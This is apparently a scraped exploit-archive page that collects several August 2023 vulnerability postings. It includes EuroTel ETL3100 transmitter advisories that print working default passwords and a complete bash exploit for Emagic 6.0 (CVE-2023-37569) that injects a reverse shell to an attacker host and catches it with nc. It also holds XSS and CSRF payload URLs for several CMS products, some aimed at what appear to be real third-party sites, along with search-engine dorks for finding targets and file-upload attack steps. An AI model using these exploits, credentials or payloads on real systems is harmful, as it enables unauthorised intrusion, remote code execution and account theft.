EuroTel ETL3100 transmitters use a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

    EuroTel ETL3100 Transmitter Default CredentialsVendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.LProduct web page: https://www.eurotel.it | https://www.siel.fmAffected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)                   v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)Summary: RF Technology For Television Broadcasting Applications.The Series ETL3100 Radio Transmitter provides all the necessaryfeatures defined by the FM and DAB standards. Two bands are providedto easily complain with analog and digital DAB standard. The SeriesETL3100 Television Transmitter provides all the necessary featuresdefined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, aswell as the analog TV standards. Three band are provided to easilycomplain with all standard channels, and switch softly from analog-TV'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.Desc: The TV and FM transmitter uses a weak set of default administrativecredentials that can be guessed in remote password attacks and gain fullcontrol of the system.Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)           lighttpd/1.4.26           PHP/5.4.3           Xilinx Virtex MachineVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5782Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php29.04.2023--Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode.Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages.

EuroTel ETL3100 Transmitter Default Credentials

Emagic Data Center Management Suite version 6.0 suffers from a remote command execution vulnerability.

# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection  
# Date: 03-08-2023  
# Exploit Author: Shubham Pandey & thewhiteh4t  
# Vendor Homepage: https://www.esds.co.in/enlight360  
# Version: 6.0.0  
# Tested on: Kali Linux  
# CVE : CVE-2023-37569

URL=$1  
LHOST=$2  
LPORT=$3

echo "*****************************"  
echo "*  ESDS eMagic 6.0.0 RCE    *"  
echo "*  > CVE-2023-37569         *"  
echo "*  > Shubham & thewhiteh4t  *"  
echo "*****************************"

if [ $# -lt 3 ]; then  
    echo """  
USAGE :

./exploit.sh http://<IP> <LHOST> <LPORT>  
./exploit.sh http://192.168.0.10 192.168.0.20 1337  
"""  
    exit 1  
fi

url="$1/index.php/monitor/operations/utilities/"

echo "[+] URL   : $URL"  
echo "[+] LHOST : $LHOST"  
echo "[+] LPORT : $LPORT"  
echo

payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"

post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

echo "[!] Triggering exploit..."

echo $url

(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &

echo "[+] Catching shell..."  
nc -lvp 4444

Emagic Data Center Management Suite 6.0 Remote Command Execution

The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.

Title: EuroTel EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability  
Advisory ID: ZSL-2023-5784  
Type: Local/Remote  
Impact: Security Bypass, Exposure of System Information, Exposure of Sensitive Information, System Access, DoS, Privilege Escalation  
Risk: (5/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_config.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability

The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

Title: EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)  
Advisory ID: ZSL-2023-5783  
Type: Local/Remote  
Impact: Privilege Escalation, Security Bypass  
Risk: (4/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_idor.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)

The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

Title: EuroTel ETL3100 Transmitter Default Credentials  
Advisory ID: ZSL-2023-5782  
Type: Local/Remote  
Impact: System Access, Exposure of System Information, Exposure of Sensitive Information  
Risk: (4/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_creds.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

PHPJabbers Vacation Rental Script version 4.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF# Date: 05/08/2023# Exploit Author: Hasan Ali YILDIR# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/vacation-rental-script/# Version: 4.0# Tested on: Windows 10 Pro## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsTechnical Detail / POC==========================1. Login Account2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)[1] Cross-Site Request ForgeryRequest:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>[2] Cross-Site Scripting (XSS)Request:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>

PHPJabbers Vacation Rental Script 4.0 Cross Site Request Forgery

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

**eHato CMS 1.0 Cross Site Scripting**

Posted Aug 9, 2023

Authored by indoushka

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 288795acae37e9889703f9a9e13f4dc91e382a11ff20d9b6c617e50c574fefb2

Download | Favorite | View

**eHato CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : eHato CMS 1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.ehato.com                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2[+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,924)
*   Arbitrary (16,191)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,343)
*   DoS (23,415)
*   Encryption (2,369)
*   Exploit (51,833)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,142)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,753)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,361)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,765)
*   Web (9,661)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,926)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,418)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,709)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,803)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eHato CMS 1.0 Cross Site Scripting

Dexx CMS HTML and Site Builder version 2.2.3 suffers from cross site scripting and arbitrary file upload vulnerabilities.

====================================================================================================================================  
| # Title     : Dexx CMS - HTML and Site Builder V2.2.3 Remote File Upload vulnerability                                           |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64 bits)                                          |   
| # Vendor    : https://www.ezwsb.com/                                                                                             |    
| # Dork      : "Our award-winning templates are the most beautiful way to present your ideas online."                             |  
====================================================================================================================================

[+] P0C : 

[+] The script is based on Laravel framework so you can apply the vulnerability for the framework

    https://dl.packetstormsecurity.net/2301-exploits/laravel9470-disclose.txt

  [-] XSS via file upload :

[+] Dorking İn Google Or Other Search Enggine.

[+] Register as a member of the target site .

[+] After registering, log in and go to /account/settings .

[+] path : https://127.0.0.1/storage/avatars/9SCDIW0ntFJYqaP9IfrOqhJfzNoyukqmbEOtJxH8.svg 

[-] Unrestricted File Upload :

[+] Go to ( Dashboard/Projects/New)to create a new project or Choose a template for your project .

[+] Choose Edit Image and upload your malicious file .

[+] path : https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/ogSIFm8ztsQv4BBEy9Ci96utafSBsu45oe1RhL3y.htm

           https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/kNHGCajolk2LcxsEZq8Q5sGn9p7Pt7gO5nOO1zwz.txt

           https://127.0.0.1/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/50otMfIHgIlJz3OFyuBMjeOSKaXs9a49YLZuaMlK.jpg

                  https://127.0.0.1/storage/projects/26/7u3ps1joxTO0o1e3jZYfvb3klddh3GFzS1dh/images/kc4FLhcYIWBq7AhOHTpxWwjPxwKRe4vX8nmLBahh.php

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Dexx CMS HTML And Site Builder 2.2.3 XSS / Arbitrary File Upload

DevSoft Arge Bilişim CMS version 1.0.0 suffers from a cross site scripting vulnerability.

    ======================================================================================================================================| # Title     : DevSoft Arge Bilişim CMS V1.0.0 XSS Vulnerability                                                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : https://devsoft.com.tr/                                                                                              |  | # Dork      : intext:''Web Yazılım: Devsoft''                                                                                      |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /urunler.php?id=90'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/adabrokercomtr/urunler.php?id=90%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DevSoft Arge Bilişim CMS 1.0.0 Cross Site Scripting

Desenvolvido Buscazip Guiaking CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Desenvolvido Buscazip Guiaking CMS v1.0 XSS Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://buscazip.com.br/                                                                                           |  | # Dork      : intext:Site desenvolvido por Buscazip, Guiaking Empresas                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload :  /imovel.php?id=22'<script>alert(/indoushka/);</script>[+] https://ariquemes190combr/imovel.php?id=22%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#php